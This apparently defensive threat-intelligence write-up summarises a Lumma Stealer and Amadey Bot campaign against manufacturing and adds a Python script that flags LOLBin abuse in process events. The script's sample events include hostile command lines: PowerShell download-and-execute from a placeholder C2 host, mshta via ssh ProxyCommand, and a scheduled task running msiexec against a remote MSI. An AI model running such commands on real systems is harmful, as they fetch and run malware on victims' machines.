
Lumma Stealer and Amadey Bot Target Manufacturing Industry

A recent analysis by Cyble Research and Intelligence Labs (CRIL) describes a multi-stage cyberattack campaign targeting the manufacturing industry. The attack chain uses process injection to deploy two well-known payloads: the Lumma Stealer infostealer and the Amadey Bot loader.

The threat actor (TA) behind this campaign employs several evasive tactics to bypass traditional security defenses, with the goal of stealing data and keeping persistent control over compromised systems.

The attack begins with a spear-phishing email containing a link to an LNK (Windows shortcut) file disguised as a PDF document. The file is hosted on a WebDAV server, so the victim's machine retrieves it over HTTP as a UNC path rather than as a conventional attachment, a delivery path that many security products inspect less closely. The link borrows the name of a legitimate cloud-based document management system to lure the victim into clicking it.

Once the LNK file is opened, it runs a series of commands through legitimate system utilities such as ssh.exe and mshta.exe that fetch additional payloads from remote servers. The download URLs are wrapped in Google's Accelerated Mobile Pages (AMP) URLs and URL shorteners, so the real hosting location sits behind trusted-looking redirects and URL-based detection is harder; the final malicious payload is delivered at the end of this chain.

The attack also relies on Living-off-the-Land Binaries (LOLBins) and DLL sideloading to evade detection. Signed, trusted executables such as powershell.exe do the work, and a malicious DLL placed beside a legitimate application is loaded by it in place of the expected library. The malicious code therefore runs in memory under a trusted process name, which makes it harder for security software to attribute the activity to malware.

Deploying Lumma Stealer and Amadey Bot lets the attackers steal sensitive data and keep control of compromised systems. Persistence is established with a scheduled task (Task Scheduler) and msiexec.exe, so the malware is relaunched and remains operational after a system reboot.

To reduce the risk from such attacks, organizations are advised to strengthen email filtering, train users to recognise phishing, and monitor the use of LOLBins, in particular mshta.exe, ssh.exe, msiexec.exe and powershell.exe being launched with remote URLs or WebDAV paths on the command line. Hardening measures such as disabling unnecessary services (including the WebClient service where WebDAV is not needed), application allow-listing, and network and URL filtering can help block attacks like those delivering Lumma Stealer and Amadey Bot.

Restricting PowerShell and other scripting engines, for example with PowerShell Constrained Language Mode and script block logging, further limits what an attacker can do after gaining a foothold, helping to safeguard sensitive data and critical infrastructure from malicious actors.
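The chain above (LNK from WebDAV, ssh.exe, mshta.exe behind an AMP-wrapped short link, PowerShell, then msiexec.exe registered as a scheduled task) is what the "monitor the use of LOLBins" advice has to catch in practice. The following detection sketch is an added example, not code from the CRIL report or from Cyble: it runs a handful of rules over constructed Sysmon-style process-creation events and follows parent PIDs so that a LOLBin spawned by another LOLBin is flagged as a chain. The event schema (pid, ppid, image, cmdline), the hostnames (all under .invalid) and the paths are assumptions chosen for illustration.

```python
"""Flag the LOLBin execution and persistence chain summarised above over
constructed Sysmon-style process-creation events.

Added example, not code from the CRIL report or from Cyble; the event
schema (pid, ppid, image, cmdline), hostnames (*.invalid) and paths are
assumptions chosen for illustration.
"""
import ntpath
import re
from typing import Dict, List

# Utilities the summary names as abused (mshta, ssh, powershell, msiexec)
# plus schtasks.exe, the CLI used to register a persistence task.
LOLBINS = {"mshta.exe", "ssh.exe", "powershell.exe", "msiexec.exe", "schtasks.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# UNC forms Windows uses for WebDAV shares: \\host@SSL\..., \\host@80\..., \\host\DavWWWRoot\...
WEBDAV_RE = re.compile(r"\\\\[\w.-]+@(?:ssl|\d+)\\|\\\\[\w.-]+\\davwwwroot\\", re.IGNORECASE)


def _basename(image: str) -> str:
    # ntpath so Windows paths split correctly even when this runs on Linux.
    return ntpath.basename(image).lower()


def ancestry(event: Dict, by_pid: Dict[int, Dict], max_depth: int = 32) -> List[str]:
    """Image basenames from the event itself up to the oldest ancestor we can see."""
    chain, cur = [], event
    for _ in range(max_depth):
        chain.append(_basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
    return chain


def analyze(events: List[Dict]) -> Dict[int, List[str]]:
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for e in events:
        image, cmd = _basename(e["image"]), e["cmdline"]
        low, hits = cmd.lower(), []
        if image in LOLBINS and (URL_RE.search(cmd) or WEBDAV_RE.search(cmd)):
            hits.append("lolbin_remote_fetch")          # LOLBin told to reach a URL or WebDAV share
        if image == "ssh.exe" and "proxycommand" in low:
            hits.append("ssh_proxycommand_exec")        # ssh -o ProxyCommand=<cmd> runs an arbitrary command
        if image == "msiexec.exe" and "/i" in low.split() and URL_RE.search(cmd):
            hits.append("msiexec_remote_install")       # msiexec /i <URL> installs straight from the web
        if image == "schtasks.exe" and "/create" in low and any(b in low for b in LOLBINS - {"schtasks.exe"}):
            hits.append("schtasks_lolbin_persistence")  # scheduled task whose action is itself a LOLBin
        lol_in_chain = {p for p in ancestry(e, by_pid) if p in LOLBINS}
        if len(lol_in_chain) >= 2:
            hits.append("lolbin_chain")                 # LOLBin spawned by another LOLBin
        if hits:
            findings[e["pid"]] = hits
    return findings


# Constructed sample (not real telemetry): the user opens the WebDAV-hosted LNK, which runs
# ssh.exe with a ProxyCommand that launches mshta.exe against an AMP-wrapped short link;
# the HTA drops a PowerShell stager that registers a scheduled task running msiexec.exe
# against a remote MSI. Two benign events are included to show they stay quiet.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r'ssh.exe -o ProxyCommand="mshta.exe \\files.invalid@SSL\DavWWWRoot\d.hta" .'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://www.google.com/amp/s/short.invalid/r"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')\""},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /tn Updater /sc onlogon /tr "msiexec.exe /i http://c2.invalid/a.msi /qn"'},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://c2.invalid/a.msi /qn"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"pid": 800, "ppid": 1, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for pid, rules in analyze(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The chain rule is the one worth keeping even if the others prove noisy in a given environment: a locally run admin script (pid 700) is a single LOLBin with no remote argument and is ignored, while mshta.exe launched by ssh.exe, or powershell.exe launched by mshta.exe, has no routine business justification. The WebDAV pattern is also the place to watch when the WebClient service cannot be disabled, since the `\\host@SSL\DavWWWRoot\` form on a command line is how the LNK delivery described above shows up in process telemetry.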
